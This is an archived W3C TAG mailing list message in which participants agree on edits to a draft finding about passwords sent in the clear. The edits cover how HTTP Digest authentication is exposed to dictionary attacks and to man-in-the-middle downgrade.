- From: ashok malhotra <ashok.malhotra@ORACLE.COM>
- Date: Fri, 02 May 2008 07:36:04 -0700
- To: noah_mendelsohn@us.ibm.com
- CC: David Orchard <orchard@pacificspirit.com>, www-tag@w3.org
+1 I agree that the prose could be improved but that can come later. Ashok noah_mendelsohn@us.ibm.com wrote: > Dave: I took an action yesterday to review specifically your edits > dealing with digest authentication. I'm glad to see that you followed up > on the suggestion that digest may be acceptable when suitably strong > passwords are chosen. The quibble I have is that you specifically suggest > that only short alphanumeric strings can be cracked, and you imply that > longer alphanumeric strings are the answer. I think both of those are > questionnable calls at best, and unnecessary to the essence of the point. > So, I suggest the following edits to your original: > > <original> > The Digest method is subject to dictionary attacks when passwords are > short common alphanumeric strings. An attacker can easily compute the > digest for a large set of such common passwords then compare against the > transmitted message. This can be mitigated by the use of significantly > longer strings, but this is very rare practice on the web. The Digest > method is subject to man in the middle attacks because an intermediary can > degrade the quality of service to basic authentication. > </original> > > <suggested> > The Digest method is subject to dictionary attacks, and must not be used > except in circumstances where passwords are known to be of sufficient > length and complexity to thwart such attacks. The sophistication and > power of dictionary-based exploits continues to increase; where before > such attacks targeted only short passwords using common terms, modern > approaches can be effective in "cracking" certain longer or more complex > passwords as well. Great care must therefore be taken if digest > authentication is to be used, and it should be noted that few systems in > common use on the Web today ensure the use of sufficiently strong > passwords. The Digest method is >also< subject to man in the middle > attacks because an intermediary can degrade the quality of service to be > >> no better than that of< basic authentication. >> > </suggested> > > I'm short on time at the moment, and I suspect that a bit of editorial > work would result in somewhat more appealing prose, but I think the > essence of the changes is important. Anyway, I believe this discharges my > action, and I will go into tracker and close it. Thank you. > > Noah > > -------------------------------------- > Noah Mendelsohn > IBM Corporation > One Rogers Street > Cambridge, MA 02142 > 1-617-693-4036 > -------------------------------------- > > > > > > > > > "David Orchard" <orchard@pacificspirit.com> > Sent by: www-tag-request@w3.org > 05/02/2008 09:19 AM > > To: www-tag@w3.org > cc: (bcc: Noah Mendelsohn/Cambridge/IBM) > Subject: Updated passwordsInTheClear-52 > > > Changes: > > Added comments about digest authentication and use of strong passwords. > > Previous changes > > Updated abstract. > Changed SHOULD NOT send passwords in the clear to MUST NOT and related > text > Added information on Digest Authentication vulnerabilities and warning > Added SSL/TLS configuration warning. > > http://www.w3.org/2001/tag/doc/passwordsInTheClear-52 > http://www.w3.org/2001/tag/doc/passwordsInTheClear-52-20080501.html > > Cheers, > Dave > > > -- All the best, Ashok
Received on Friday, 2 May 2008 14:39:11 UTC